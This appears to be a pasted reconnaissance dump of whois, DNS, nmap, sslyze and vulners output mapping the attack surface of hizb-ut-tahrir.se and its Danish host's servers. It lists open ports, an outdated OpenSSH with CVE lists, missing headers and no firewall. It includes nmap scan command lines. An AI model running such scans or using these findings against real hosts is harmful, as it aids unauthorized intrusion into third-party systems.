· 6 years ago · Jan 17, 2020, 01:30 AM
#######################################################################################################################################
=======================================================================================================================================
Hostname      hizb-ut-tahrir.se    ISP            Zitcom A/S
Continent     Europe               Flag           DK
Country       Denmark              Country Code   DK
Region        South Denmark        Local time     17 Jan 2020 01:12 CET
City          Langeskov            Postal Code    5550
IP Address    93.191.156.197       Latitude       55.357
                                   Longitude      10.585
=======================================================================================================================================
######################################################################################################################################
> hizb-ut-tahrir.se
Server: 185.93.180.131
Address: 185.93.180.131#53

Non-authoritative answer:
Name: hizb-ut-tahrir.se
Address: 93.191.156.197
>
#######################################################################################################################################
state: active
domain: hizb-ut-tahrir.se
holder: (not shown)
admin-c: (not shown)
tech-c: SURSUR0903-00003
billing-c: SURSUR0903-00001
created: 2012-10-12
modified: 2019-10-07
expires: 2020-10-12
nserver: ns1.unoeuro.com
nserver: ns2.unoeuro.com
nserver: ns3.unoeuro.com
nserver: ns4.unoeuro.com
dnssec: unsigned delegation
registry-lock: unlocked
status: ok
registrar: Surftown Europe
#######################################################################################################################################
[+] Target : hizb-ut-tahrir.se

[+] IP Address : 93.191.156.197

[+] Headers :

[+] Date : Fri, 17 Jan 2020 00:29:36 GMT
[+] Server : Apache
[+] Content-Length : 221
[+] Keep-Alive : timeout=20, max=10000
[+] Connection : Keep-Alive
[+] Content-Type : text/html; charset=iso-8859-1

[+] SSL Certificate Information :

[+] commonName : hizb-ut-tahrir.se
[+] countryName : US
[+] organizationName : Let's Encrypt
[+] commonName : Let's Encrypt Authority X3
[+] Version : 3
[+] Serial Number : 0428545C12839233317EF4EDE728037CBFE5
[+] Not Before : Dec 4 04:01:19 2019 GMT
[+] Not After : Mar 3 04:01:19 2020 GMT
[+] OCSP : ('http://ocsp.int-x3.letsencrypt.org',)
[+] subject Alt Name : (('DNS', 'hizb-ut-tahrir.se'), ('DNS', 'www.hizb-ut-tahrir.se'))
[+] CA Issuers : ('http://cert.int-x3.letsencrypt.org/',)

[+] Whois Lookup :

[+] NIR : None
[+] ASN Registry : ripencc
[+] ASN : 48854
[+] ASN CIDR : 93.191.156.0/24
[+] ASN Country Code : DK
[+] ASN Date : 2010-09-02
[+] ASN Description : ZITCOM, DK
[+] cidr : 93.191.156.0/24
[+] name : ACL-2342
[+] handle : ZIN4-RIPE
[+] range : 93.191.156.0 - 93.191.156.255
[+] description : ZITCOM A/S
[+] country : DK
[+] state : None
[+] city : None
[+] address : Hjvangen 4
8660
Skanderborg
DENMARK
[+] postal_code : None
[+] emails : ['abuse@zitcom.dk']
[+] created : 2018-01-03T12:40:00Z
[+] updated : 2018-01-03T12:41:38Z

[+] Crawling Target...

[+] Looking for robots.txt........[ Found ]
[+] Extracting robots Links.......[ 4 ]
[+] Looking for sitemap.xml.......[ Not Found ]
[+] Extracting CSS Links..........[ 6 ]
[+] Extracting Javascript Links...[ 18 ]
[+] Extracting Internal Links.....[ 27 ]
[+] Extracting External Links.....[ 16 ]
[+] Extracting Images.............[ 17 ]

[+] Total Links Extracted : 88

[+] Dumping Links in /opt/FinalRecon/dumps/hizb-ut-tahrir.se.dump
[+] Completed!
######################################################################################################################################
[i] Scanning Site: http://hizb-ut-tahrir.se

B A S I C I N F O
====================

[+] Site Title:
[+] IP address: 93.191.156.197
[+] Web Server: Apache
[+] CMS: Could Not Detect
[+] Cloudflare: Not Detected
[+] Robots File: Could NOT Find robots.txt!

W H O I S L O O K U P
========================

# Copyright (c) 1997- The Swedish Internet Foundation.
# All rights reserved.
# The information obtained through searches, or otherwise, is protected
# by the Swedish Copyright Act (1960:729) and international conventions.
# It is also subject to database protection according to the Swedish
# Copyright Act.
# Any use of this material to target advertising or
# similar activities is forbidden and will be prosecuted.
# If any of the information below is transferred to a third
# party, it must be done in its entirety. This server must
# not be used as a backend for a search engine.
# Result of search for registered domain names under
# the .se top level domain.
# This whois printout is printed with UTF-8 encoding.
#
state: active
domain: hizb-ut-tahrir.se
holder: (not shown)
admin-c: (not shown)
tech-c: SURSUR0903-00003
billing-c: SURSUR0903-00001
created: 2012-10-12
modified: 2019-10-07
expires: 2020-10-12
nserver: ns1.unoeuro.com
nserver: ns2.unoeuro.com
nserver: ns3.unoeuro.com
nserver: ns4.unoeuro.com
dnssec: unsigned delegation
registry-lock: unlocked
status: ok
registrar: Surftown Europe

G E O I P L O O K U P
=========================

[i] IP Address: 93.191.156.197
[i] Country: Denmark
[i] State: South Denmark
[i] City: Aabenraa
[i] Latitude: 55.0443
[i] Longitude: 9.4174

H T T P H E A D E R S
=======================

[i] HTTP/1.1 406 Not Acceptable
[i] Date: Fri, 17 Jan 2020 00:30:00 GMT
[i] Server: Apache
[i] Content-Length: 221
[i] Connection: close
[i] Content-Type: text/html; charset=iso-8859-1

D N S L O O K U P
===================

hizb-ut-tahrir.se. 3599 IN A 93.191.156.197
hizb-ut-tahrir.se. 3599 IN MX 10 mx.unoeuro.com.
hizb-ut-tahrir.se. 3599 IN NS ns1.unoeuro.com.
hizb-ut-tahrir.se. 3599 IN NS ns2.unoeuro.com.
hizb-ut-tahrir.se. 3599 IN NS ns3.unoeuro.com.
hizb-ut-tahrir.se. 3599 IN NS ns4.unoeuro.com.
hizb-ut-tahrir.se. 3599 IN TXT "v=spf1 include:spf.unoeuro.com ?all"
hizb-ut-tahrir.se. 14399 IN SOA ns1.unoeuro.com. hostmaster.unoeuro.com. 2019060300 14400 3600 1209600 3600

S U B N E T C A L C U L A T I O N
====================================

Address = 93.191.156.197
Network = 93.191.156.197 / 32
Netmask = 255.255.255.255
Broadcast = not needed on Point-to-Point links
Wildcard Mask = 0.0.0.0
Hosts Bits = 0
Max. Hosts = 1 (2^0 - 0)
Host Range = { 93.191.156.197 - 93.191.156.197 }

N M A P P O R T S C A N
============================

Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-17 00:30 UTC
Nmap scan report for hizb-ut-tahrir.se (93.191.156.197)
Host is up (0.096s latency).
rDNS record for 93.191.156.197: linux307.unoeuro.com

PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp filtered telnet
80/tcp open http
110/tcp filtered pop3
143/tcp filtered imap
443/tcp open https
3389/tcp filtered ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 2.06 seconds

S U B - D O M A I N F I N D E R
==================================

[i] Total Subdomains Found : 1

[+] Subdomain: www.hizb-ut-tahrir.se
[-] IP: 93.191.156.197
#######################################################################################################################################
[+] Starting At 2020-01-16 19:30:19.574189
[+] Collecting Information On: http://hizb-ut-tahrir.se/
[#] Status: 200
--------------------------------------------------
[#] Web Server Detected: Apache
[#] X-Powered-By: PHP/5.6.40
[!] X-Frame-Options Headers not detect! target might be vulnerable Click Jacking
- Date: Fri, 17 Jan 2020 00:30:15 GMT
- Server: Apache
- X-Powered-By: PHP/5.6.40
- Link: <https://hizb-ut-tahrir.se/wp-json/>; rel="https://api.w.org/"
- Upgrade: h2
- Connection: Upgrade, Keep-Alive
- Vary: Accept-Encoding
- Content-Encoding: gzip
- Content-Length: 10909
- Keep-Alive: timeout=20, max=10000
- Content-Type: text/html; charset=UTF-8
--------------------------------------------------
[#] Finding Location..!
[#] status: success
[#] country: Denmark
[#] countryCode: DK
[#] region: 82
[#] regionName: Central Jutland
[#] city: Skanderborg
[#] zip: 8660
[#] lat: 56.0482
[#] lon: 9.94533
[#] timezone: Europe/Copenhagen
[#] isp: Zitcom A/S
[#] org: Zitcom
[#] as: AS48854 Zitcom A/S
[#] query: 93.191.156.197
--------------------------------------------------
[x] Didn't Detect WAF Presence on: http://hizb-ut-tahrir.se/
--------------------------------------------------
[#] Starting Reverse DNS
[-] Failed ! Fail
--------------------------------------------------
[!] Scanning Open Port
[#] 21/tcp open ftp
[#] 22/tcp open ssh
[#] 80/tcp open http
[#] 443/tcp open https
--------------------------------------------------
[+] Getting SSL Info
{'OCSP': ('http://ocsp.int-x3.letsencrypt.org',),
 'caIssuers': ('http://cert.int-x3.letsencrypt.org/',),
 'issuer': ((('countryName', 'US'),),
 (('organizationName', "Let's Encrypt"),),
 (('commonName', "Let's Encrypt Authority X3"),)),
 'notAfter': 'Mar 3 04:01:19 2020 GMT',
 'notBefore': 'Dec 4 04:01:19 2019 GMT',
 'serialNumber': '0428545C12839233317EF4EDE728037CBFE5',
 'subject': ((('commonName', 'hizb-ut-tahrir.se'),),),
 'subjectAltName': (('DNS', 'hizb-ut-tahrir.se'),
 ('DNS', 'www.hizb-ut-tahrir.se')),
 'version': 3}

--------------------------------------------------
[+] Collecting Information Disclosure!
[#] Detecting sitemap.xml file
[-] sitemap.xml file not Found!?
[#] Detecting robots.txt file
[!] robots.txt File Found: http://hizb-ut-tahrir.se//robots.txt
[#] Detecting GNU Mailman
[-] GNU Mailman App Not Detected!?
--------------------------------------------------
[+] Crawling Url Parameter On: http://hizb-ut-tahrir.se/
--------------------------------------------------
[#] Searching Html Form !
[+] Html Form Discovered
[#] action: https://hizb-ut-tahrir.se/
[#] class: ['flymag-search-form']
[#] id: None
[#] method: get
--------------------------------------------------
[!] Found 1 dom parameter
[#] http://hizb-ut-tahrir.se//#content
--------------------------------------------------
[!] 1 Internal Dynamic Parameter Discovered
[+] https://hizb-ut-tahrir.se/xmlrpc.php?rsd
--------------------------------------------------
[-] No external Dynamic Paramter Found!?
--------------------------------------------------
[!] 101 Internal links Discovered
--------------------------------------------------
[!] 17 External links Discovered
--------------------------------------------------
[#] Mapping Subdomain..
[!] Found 2 Subdomain
- hizb-ut-tahrir.se
- www.hizb-ut-tahrir.se
--------------------------------------------------
[!] Done At 2020-01-16 19:31:02.372126
######################################################################################################################################
Trying "hizb-ut-tahrir.se"
Trying "hizb-ut-tahrir.se"
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 12426
;; flags: qr rd ra; QUERY: 1, ANSWER: 10, AUTHORITY: 0, ADDITIONAL: 6

;; QUESTION SECTION:
;hizb-ut-tahrir.se. IN ANY

;; ANSWER SECTION:
hizb-ut-tahrir.se. 14400 IN SOA ns1.unoeuro.com. hostmaster.unoeuro.com. 2019060300 14400 3600 1209600 3600
hizb-ut-tahrir.se. 3600 IN TXT "v=spf1 include:spf.unoeuro.com ?all"
hizb-ut-tahrir.se. 3600 IN MX 10 mx.unoeuro.com.
hizb-ut-tahrir.se. 3600 IN A 93.191.156.197
hizb-ut-tahrir.se. 7200 IN RRSIG NSEC 8 2 7200 20200129111026 20200115081042 40264 se. x50SzwKp67I1CaGsEkjP896WJMbzQATn2IqH18hqhkJ6zbJ7BGM+Hane Nc29U9EQgsOzQjqH0RzDFwrpNB7bdWc5K2KXmemnYYldKc79yGZmLAjA rEgOA2md+4mizNaXYadx71HebCHjNosG2A6iEg98mn532PRRbwIJmv8+ 93htlDum9XfnMg0nKy+D4X9s5WvALLrNe4W4kUi30H5ZrsUAApjBMYDh D8UjJ0pCeSK2mhGk/sPtlaFRo9jPC3LEztRs3XkmrKYWC0wHUS/h5WeY bgdrSPjAX5X55U8T8xF13MF8QGbFiQ51JMIhY/DpungOMBy0TD0wGWWn 3hg10Q==
hizb-ut-tahrir.se. 7200 IN NSEC hizentra.se. NS RRSIG NSEC
hizb-ut-tahrir.se. 3600 IN NS ns1.unoeuro.com.
hizb-ut-tahrir.se. 3600 IN NS ns2.unoeuro.com.
hizb-ut-tahrir.se. 3600 IN NS ns3.unoeuro.com.
hizb-ut-tahrir.se. 3600 IN NS ns4.unoeuro.com.

;; ADDITIONAL SECTION:
ns1.unoeuro.com. 31062 IN A 46.36.215.2
ns2.unoeuro.com. 31062 IN A 185.25.141.15
ns3.unoeuro.com. 31062 IN A 83.217.78.186
ns4.unoeuro.com. 31062 IN A 85.159.211.233
ns3.unoeuro.com. 31062 IN AAAA 2a00:1c98:10:26::10
ns4.unoeuro.com. 31062 IN AAAA 2a01:7e00::f03c:91ff:fe50:2326

Received 691 bytes from 2001:18c0:121:6900:724f:b8ff:fefd:5b6a#53 in 47 ms
#######################################################################################################################################
; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> +trace hizb-ut-tahrir.se any
;; global options: +cmd
. 86307 IN NS a.root-servers.net.
. 86307 IN NS m.root-servers.net.
. 86307 IN NS i.root-servers.net.
. 86307 IN NS b.root-servers.net.
. 86307 IN NS j.root-servers.net.
. 86307 IN NS l.root-servers.net.
. 86307 IN NS h.root-servers.net.
. 86307 IN NS e.root-servers.net.
. 86307 IN NS f.root-servers.net.
. 86307 IN NS g.root-servers.net.
. 86307 IN NS k.root-servers.net.
. 86307 IN NS d.root-servers.net.
. 86307 IN NS c.root-servers.net.
. 86307 IN RRSIG NS 8 0 518400 20200129220000 20200116210000 33853 . 1vCC1jMvN09c/Zmc3AeY6amgwDOwSdCvPbj4bbcctvqPrLVk6Gg/0n8m KEs4BrJe3bQqMvZPNTm9oyk3lRVCWSnBWQMNApfRkGixIWu6tld0AUfQ ZJYoW0x8VVcZrgeypfRSxiH5o0GnsnvOKhoinigCApFukK1M4lIR/Rzj CmK4iYpZHMhs2iXhrDqMYuPTLeRP7XXg5KOSYBS0JMfwbmVowvI3/Yno GjMCt9J/0gMNH3OThhorzyE1srY5bueqS/AnbDtz6MskregHAx5zQbx2 qgg+0Cs32FsIF3SvHM9M07T8ksfEoAnJg8AfrMFctWGdhYgNDC1CbUf1 zAR6pw==
;; Received 525 bytes from 185.93.180.131#53(185.93.180.131) in 241 ms

se. 172800 IN NS a.ns.se.
se. 172800 IN NS b.ns.se.
se. 172800 IN NS c.ns.se.
se. 172800 IN NS x.ns.se.
se. 172800 IN NS z.ns.se.
se. 172800 IN NS f.ns.se.
se. 172800 IN NS g.ns.se.
se. 172800 IN NS i.ns.se.
se. 172800 IN NS y.ns.se.
se. 86400 IN DS 59407 8 2 67A8E06FCEFDD9397F77F26C41ADE4EC142F299BCFA1827F0EF8FD87 F2F63022
se. 86400 IN RRSIG DS 8 1 86400 20200129220000 20200116210000 33853 . 18SrPJ2ea3bD1w4337qAsE5AqJXQcyUji/6KANdo6QNHKQya10ROwZ0W 6Eq3emdqwqcj2+flRqVZg/CzGDnnM9lSZ+x9gb0Rfuj2vbXiYqW8xLTa NjqBz+T5cc83glUK23bn3Aw3t4raPDCVwGqIp0zFwCzlVNMUZdq6pE/1 36ttiTphzHMAoUv70oYEioe1b7vohBLrrtID3awYTu7LlP6DZ94TLmSZ +po5tH68FwDgzExAdLJvRi83pBE/DaoGP6Ccc6xMcSUDQq3B3txSMCuv R7vnB/VxHEwAUkVCdnDpykdL6pvhQv7wZjTOTZ8V//kv57WtARUzfI3v W9cVew==
;; Received 924 bytes from 193.0.14.129#53(k.root-servers.net) in 231 ms

hizb-ut-tahrir.se. 86400 IN NS ns1.unoeuro.com.
hizb-ut-tahrir.se. 86400 IN NS ns4.unoeuro.com.
hizb-ut-tahrir.se. 86400 IN NS ns3.unoeuro.com.
hizb-ut-tahrir.se. 86400 IN NS ns2.unoeuro.com.
hizb-ut-tahrir.se. 7200 IN NSEC hizentra.se. NS RRSIG NSEC
hizb-ut-tahrir.se. 7200 IN RRSIG NSEC 8 2 7200 20200129111026 20200115081042 40264 se. x50SzwKp67I1CaGsEkjP896WJMbzQATn2IqH18hqhkJ6zbJ7BGM+Hane Nc29U9EQgsOzQjqH0RzDFwrpNB7bdWc5K2KXmemnYYldKc79yGZmLAjA rEgOA2md+4mizNaXYadx71HebCHjNosG2A6iEg98mn532PRRbwIJmv8+ 93htlDum9XfnMg0nKy+D4X9s5WvALLrNe4W4kUi30H5ZrsUAApjBMYDh D8UjJ0pCeSK2mhGk/sPtlaFRo9jPC3LEztRs3XkmrKYWC0wHUS/h5WeY bgdrSPjAX5X55U8T8xF13MF8QGbFiQ51JMIhY/DpungOMBy0TD0wGWWn 3hg10Q==
;; Received 480 bytes from 2a01:3f0:0:301::53#53(a.ns.se) in 138 ms

hizb-ut-tahrir.se. 3600 IN A 93.191.156.197
hizb-ut-tahrir.se. 3600 IN MX 10 mx.unoeuro.com.
hizb-ut-tahrir.se. 3600 IN NS ns1.unoeuro.com.
hizb-ut-tahrir.se. 3600 IN NS ns2.unoeuro.com.
hizb-ut-tahrir.se. 3600 IN NS ns3.unoeuro.com.
hizb-ut-tahrir.se. 3600 IN NS ns4.unoeuro.com.
hizb-ut-tahrir.se. 3600 IN TXT "v=spf1 include:spf.unoeuro.com ?all"
hizb-ut-tahrir.se. 14400 IN SOA ns1.unoeuro.com. hostmaster.unoeuro.com. 2019060300 14400 3600 1209600 3600
;; Received 259 bytes from 85.159.211.233#53(ns4.unoeuro.com) in 315 ms
######################################################################################################################################
[*] Performing General Enumeration of Domain: hizb-ut-tahrir.se
[!] Wildcard resolution is enabled on this domain
[!] It is resolving to 93.191.156.197
[!] All queries will resolve to this address!!
[-] DNSSEC is not configured for hizb-ut-tahrir.se
[*] SOA ns1.unoeuro.com 46.36.215.2
[*] NS ns4.unoeuro.com 85.159.211.233
[*] NS ns4.unoeuro.com 2a01:7e00::f03c:91ff:fe50:2326
[*] NS ns2.unoeuro.com 185.25.141.15
[*] NS ns1.unoeuro.com 46.36.215.2
[*] NS ns3.unoeuro.com 83.217.78.186
[*] NS ns3.unoeuro.com 2a00:1c98:10:26::10
[*] MX mx.unoeuro.com 94.231.103.108
[*] A hizb-ut-tahrir.se 93.191.156.197
[*] TXT hizb-ut-tahrir.se v=spf1 include:spf.unoeuro.com ?all
[*] Enumerating SRV Records
[*] SRV _autodiscover._tcp.hizb-ut-tahrir.se maildiscover.unoeuro.com 94.231.108.222 443 10
[+] 1 Records Found
######################################################################################################################################
[*] Processing domain hizb-ut-tahrir.se
[*] Using system resolvers ['185.93.180.131', '194.187.251.67', '38.132.106.139', '192.168.0.1', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a']
[+] Getting nameservers
85.159.211.233 - ns4.unoeuro.com
185.25.141.15 - ns2.unoeuro.com
46.36.215.2 - ns1.unoeuro.com
83.217.78.186 - ns3.unoeuro.com
[-] Zone transfer failed

[+] TXT records found
"v=spf1 include:spf.unoeuro.com ?all"

[+] MX records found, added to target list
10 mx.unoeuro.com.

[+] Wildcard domain found - 93.191.156.197
[*] Scanning hizb-ut-tahrir.se for A records
94.231.108.222 - autoconfig.hizb-ut-tahrir.se
94.231.103.107 - mail.hizb-ut-tahrir.se
94.231.106.220 - smtp.hizb-ut-tahrir.se
######################################################################################################################################
 AVAILABLE PLUGINS
 -----------------

 SessionResumptionPlugin
 CertificateInfoPlugin
 SessionRenegotiationPlugin
 HeartbleedPlugin
 OpenSslCipherSuitesPlugin
 CompressionPlugin
 FallbackScsvPlugin
 HttpHeadersPlugin
 RobotPlugin
 EarlyDataPlugin
 OpenSslCcsInjectionPlugin

 CHECKING HOST(S) AVAILABILITY
 -----------------------------

 93.191.156.197:443 => 93.191.156.197

 SCAN RESULTS FOR 93.191.156.197:443 - 93.191.156.197
 ----------------------------------------------------

 * OpenSSL CCS Injection:
 OK - Not vulnerable to OpenSSL CCS injection

 * SSLV2 Cipher Suites:
 Server rejected all cipher suites.

 * TLS 1.2 Session Resumption Support:
 With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
 With TLS Tickets: NOT SUPPORTED - TLS ticket not assigned.

 * OpenSSL Heartbleed:
 OK - Not vulnerable to Heartbleed

 * Session Renegotiation:
 Client-initiated Renegotiation: OK - Rejected
 Secure Renegotiation: OK - Supported

 * Deflate Compression:
 OK - Compression disabled

 * TLSV1_3 Cipher Suites:
 Forward Secrecy OK - Supported
 RC4 OK - Not Supported

 Preferred:
 TLS_AES_256_GCM_SHA384 256 bits HTTP 302 Found - http://93.191.156.197/
 Accepted:
 TLS_CHACHA20_POLY1305_SHA256 256 bits HTTP 302 Found - http://93.191.156.197/
 TLS_AES_256_GCM_SHA384 256 bits HTTP 302 Found - http://93.191.156.197/
 TLS_AES_128_GCM_SHA256 128 bits HTTP 302 Found - http://93.191.156.197/

 * SSLV3 Cipher Suites:
 Server rejected all cipher suites.

 * Certificate Information:
 Content
 SHA1 Fingerprint: 5c07943fab62063eae87bb01ef1298d0faaeac4e
 Common Name: *.unoeuro.com
 Issuer: Sectigo RSA Domain Validation Secure Server CA
 Serial Number: 336869185492694657019599526345354463740
 Not Before: 2019-02-06 00:00:00
 Not After: 2021-02-05 23:59:59
 Signature Algorithm: sha256
 Public Key Algorithm: RSA
 Key Size: 2048
 Exponent: 65537 (0x10001)
 DNS Subject Alternative Names: ['*.unoeuro.com', 'unoeuro.com']

 Trust
 Hostname Validation: FAILED - Certificate does NOT match 93.191.156.197
 Android CA Store (9.0.0_r9): OK - Certificate is trusted
 Apple CA Store (iOS 12, macOS 10.14, watchOS 5, and tvOS 12):OK - Certificate is trusted
 Java CA Store (jdk-12.0.1): OK - Certificate is trusted
 Mozilla CA Store (2019-03-14): OK - Certificate is trusted
 Windows CA Store (2019-05-27): OK - Certificate is trusted
 Symantec 2018 Deprecation: WARNING: Certificate distrusted by Google and Mozilla on September 2018
 Received Chain: *.unoeuro.com --> Sectigo RSA Domain Validation Secure Server CA --> USERTrust RSA Certification Authority
 Verified Chain: *.unoeuro.com --> Sectigo RSA Domain Validation Secure Server CA --> USERTrust RSA Certification Authority
 Received Chain Contains Anchor: OK - Anchor certificate not sent
 Received Chain Order: OK - Order is valid
 Verified Chain contains SHA1: OK - No SHA1-signed certificate in the verified certificate chain

 Extensions
 OCSP Must-Staple: NOT SUPPORTED - Extension not found
 Certificate Transparency: OK - 3 SCTs included

 OCSP Stapling
 NOT SUPPORTED - Server did not send back an OCSP response

 * ROBOT Attack:
 OK - Not vulnerable

 * Downgrade Attacks:
 TLS_FALLBACK_SCSV: OK - Supported

 * TLSV1_1 Cipher Suites:
 Server rejected all cipher suites.

 * TLSV1 Cipher Suites:
 Server rejected all cipher suites.

 * TLSV1_2 Cipher Suites:
 Forward Secrecy OK - Supported
 RC4 OK - Not Supported

 Preferred:
 None - Server followed client cipher suite preference.
 Accepted:
 TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 256 bits HTTP 302 Found - http://93.191.156.197/
 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 302 Found - http://93.191.156.197/
 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 302 Found - http://93.191.156.197/
 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 302 Found - http://93.191.156.197/
 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 302 Found - http://93.191.156.197/

 SCAN COMPLETED IN 24.41 S
 -------------------------
#####################################################################################################################################
750Domains still to check: 1
751 Checking if the hostname hizb-ut-tahrir.se. given is in fact a domain...
752
753Analyzing domain: hizb-ut-tahrir.se.
754 Checking NameServers using system default resolver...
755 IP: 85.159.211.233 (United Kingdom)
756 HostName: ns4.unoeuro.com Type: NS
757 HostName: ns4.unoeuro.com Type: PTR
758 IP: 185.25.141.15 (Denmark)
759 HostName: ns2.unoeuro.com Type: NS
760 HostName: ns2.unoeuro.com Type: PTR
761 IP: 46.36.215.2 (Denmark)
762 HostName: ns1.unoeuro.com Type: NS
763 HostName: ns1.unoeuro.com Type: PTR
764 IP: 83.217.78.186 (Belgium)
765 HostName: ns3.unoeuro.com Type: NS
766 HostName: ns3.unoeuro.com Type: PTR
767
768 Checking MailServers using system default resolver...
769 IP: 94.231.103.108 (Denmark)
770 HostName: mx.unoeuro.com Type: MX
771 HostName: mx.unoeuro.com Type: PTR
772 WARNING!! This domain has wildcards activated for hostnames resolution. We are checking "www" anyway, but perhaps it doesn't exists!
773
774 Checking the zone transfer for each NS... (if this takes more than 10 seconds, just hit CTRL-C and it will continue. Bug in the libs)
775 No zone transfer found on nameserver 85.159.211.233
776 No zone transfer found on nameserver 185.25.141.15
777 No zone transfer found on nameserver 46.36.215.2
778 No zone transfer found on nameserver 83.217.78.186
779
780 Checking SPF record...
781
782 Checking SPF record...
783 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 94.231.96.0/20, but only the network IP
784 New IP found: 94.231.96.0
785 WARNING! SPF record allows an entire network to send mails. Probably an ISP network. We are not going to check the entire network by now: 93.191.156.0/24, but only the network IP
786 New IP found: 93.191.156.0
787
788 Checking 1 most common hostnames using system default resolver...
789 IP: 93.191.156.197 (Denmark)
790 HostName: www.hizb-ut-tahrir.se. Type: A
791
792 Checking with nmap the reverse DNS hostnames of every <ip>/24 netblock using system default resolver...
793 Checking netblock 94.231.103.0
794 Checking netblock 83.217.78.0
795 Checking netblock 85.159.211.0
796 Checking netblock 93.191.156.0
797 Checking netblock 94.231.96.0
798 Checking netblock 46.36.215.0
799 Checking netblock 185.25.141.0
800
801 Searching for hizb-ut-tahrir.se. emails in Google
802
803 Checking 8 active hosts using nmap... (nmap -sn -n -v -PP -PM -PS80,25 -PA -PY -PU53,40125 -PE --reason <ip> -oA <output_directory>/nmap/<ip>.sn)
804 Host 94.231.103.108 is up (reset ttl 64)
805 Host 83.217.78.186 is up (reset ttl 64)
806 Host 85.159.211.233 is up (reset ttl 64)
807 Host 93.191.156.197 is up (reset ttl 64)
808 Host 94.231.96.0 is up (reset ttl 64)
809 Host 93.191.156.0 is up (reset ttl 64)
810 Host 46.36.215.2 is up (reset ttl 64)
811 Host 185.25.141.15 is up (reset ttl 64)
812
813 Checking ports on every active host using nmap... (nmap -O --reason --webxml --traceroute -sS -sV -sC -Pn -n -v -F <ip> -oA <output_directory>/nmap/<ip>)
814 Scanning ip 94.231.103.108 (mx.unoeuro.com (PTR)):
815 Scanning ip 83.217.78.186 (ns3.unoeuro.com (PTR)):
816 Scanning ip 85.159.211.233 (ns4.unoeuro.com (PTR)):
817 22/tcp open ssh syn-ack ttl 55 OpenSSH 5.3 (protocol 2.0)
818 | ssh-hostkey:
819 | 1024 26:89:db:e3:2f:2c:2c:7a:d3:18:9a:01:99:bd:09:87 (DSA)
820 |_ 2048 29:5e:d4:4e:b4:f2:4f:01:e8:4e:e5:8c:4f:98:c0:9a (RSA)
821 | vulners:
822 | cpe:/a:openbsd:openssh:5.3:
823 | CVE-2014-1692 7.5 https://vulners.com/cve/CVE-2014-1692
824 | CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
825 | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
826 | CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
827 | CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
828 | CVE-2016-0777 4.0 https://vulners.com/cve/CVE-2016-0777
829 | CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
830 | CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814
831 | CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000
832 |_ CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327
833 53/tcp open domain? syn-ack ttl 55
834 | dns-nsid:
835 | NSID: ns4.unoeuro.com (6e73342e756e6f6575726f2e636f6d)
836 |_ id.server: ns4.unoeuro.com
837 | fingerprint-strings:
838 | DNSVersionBindReqTCP:
839 | version
840 |_ bind
841 Scanning ip 93.191.156.197 (www.hizb-ut-tahrir.se.):
842 21/tcp open tcpwrapped syn-ack ttl 43
843 22/tcp open ssh syn-ack ttl 45 OpenSSH 5.3 (protocol 2.0)
844 | ssh-hostkey:
845 | 1024 fa:d3:03:2f:db:82:8d:21:30:46:74:25:37:bb:fa:3e (DSA)
846 |_ 2048 e1:2a:51:40:6c:bd:91:34:21:28:ab:59:64:59:9b:4a (RSA)
847 | vulners:
848 | cpe:/a:openbsd:openssh:5.3:
849 | CVE-2014-1692 7.5 https://vulners.com/cve/CVE-2014-1692
850 | CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
851 | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
852 | CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
853 | CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
854 | CVE-2016-0777 4.0 https://vulners.com/cve/CVE-2016-0777
855 | CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
856 | CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814
857 | CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000
858 |_ CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327
859 80/tcp open http syn-ack ttl 44 Apache httpd
860 | http-methods:
861 |_ Supported Methods: OPTIONS HEAD GET POST
862 |_http-server-header: Apache
863 |_http-title: This server is operated by UnoEuro Webhosting
864 443/tcp open ssl/http syn-ack ttl 43 Apache httpd
865 |_http-server-header: Apache
866 |_http-title: 403 Forbidden
867 | ssl-cert: Subject: commonName=*.unoeuro.com
868 | Subject Alternative Name: DNS:*.unoeuro.com, DNS:unoeuro.com
869 | Issuer: commonName=Sectigo RSA Domain Validation Secure Server CA/organizationName=Sectigo Limited/stateOrProvinceName=Greater Manchester/countryName=GB
870 | Public Key type: rsa
871 | Public Key bits: 2048
872 | Signature Algorithm: sha256WithRSAEncryption
873 | Not valid before: 2019-02-06T00:00:00
874 | Not valid after: 2021-02-05T23:59:59
875 | MD5: 672e f1c5 0cc7 d81f 31c1 9cd8 88cc 6bcc
876 |_SHA-1: 5c07 943f ab62 063e ae87 bb01 ef12 98d0 faae ac4e
877 Scanning ip 94.231.96.0 ():
878 Scanning ip 93.191.156.0 ():
879 Scanning ip 46.36.215.2 (ns1.unoeuro.com (PTR)):
880 53/tcp open domain? syn-ack ttl 48
881 | dns-nsid:
882 | NSID: ns1.unoeuro.com (6e73312e756e6f6575726f2e636f6d)
883 |_ id.server: ns1.unoeuro.com
884 | fingerprint-strings:
885 | DNSVersionBindReqTCP:
886 | version
887 |_ bind
